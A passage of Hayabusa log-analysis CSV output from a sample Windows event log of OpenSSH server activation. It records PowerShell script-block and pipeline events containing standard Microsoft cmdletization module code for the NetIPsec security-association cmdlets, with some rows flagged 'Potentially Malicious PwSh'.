.EXTERNALHELP NetIPsecMainModeSA.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecMainModeSA' -Alias '*' function Remove-NetIPsecMainModeSA { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeSA}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeSA')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('Name', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeSA') -and (@('ByAssociatedNetIPsecQuickModeSA') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeSA}, 'MSFT_NetSAAssociation', 'Dependent', 'Antecedent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByAssociatedNetIPsecQuickModeSA', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeSA.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecMainModeSA' -Alias '*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.833 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.834 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.834 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecMainModeSA"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.834 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecMainModeSA"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.859 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetQuickModeSA' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetIPsecQuickModeSA { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeSA}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeSA') -and (@('ByAssociatedNetIPsecMainModeSA') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeSA}, 'MSFT_NetSAAssociation', 'Antecedent', 'Dependent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeSA.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecQuickModeSA' -Alias '*' function Remove-NetIPsecQuickModeSA { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeSA}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetQuickModeSA')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeSA') -and (@('ByAssociatedNetIPsecMainModeSA') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeSA}, 'MSFT_NetSAAssociation', 'Antecedent', 'Dependent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByAssociatedNetIPsecMainModeSA', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeSA.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecQuickModeSA' -Alias '*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.859 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetQuickModeSA' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetIPsecQuickModeSA { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeSA}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeSA') -and (@('ByAssociatedNetIPsecMainModeSA') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeSA}, 'MSFT_NetSAAssociation', 'Antecedent', 'Dependent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeSA.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecQuickModeSA' -Alias '*' function Remove-NetIPsecQuickModeSA { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeSA}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetQuickModeSA')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeSA') -and (@('ByAssociatedNetIPsecMainModeSA') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeSA}, 'MSFT_NetSAAssociation', 'Antecedent', 'Dependent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByAssociatedNetIPsecMainModeSA', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeSA.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecQuickModeSA' -Alias '*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.860 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.860 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.860 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecQuickModeSA"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.861 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecQuickModeSA"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.893 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetSecuritySettingData' $script:ClassVersion = '1.0.0' 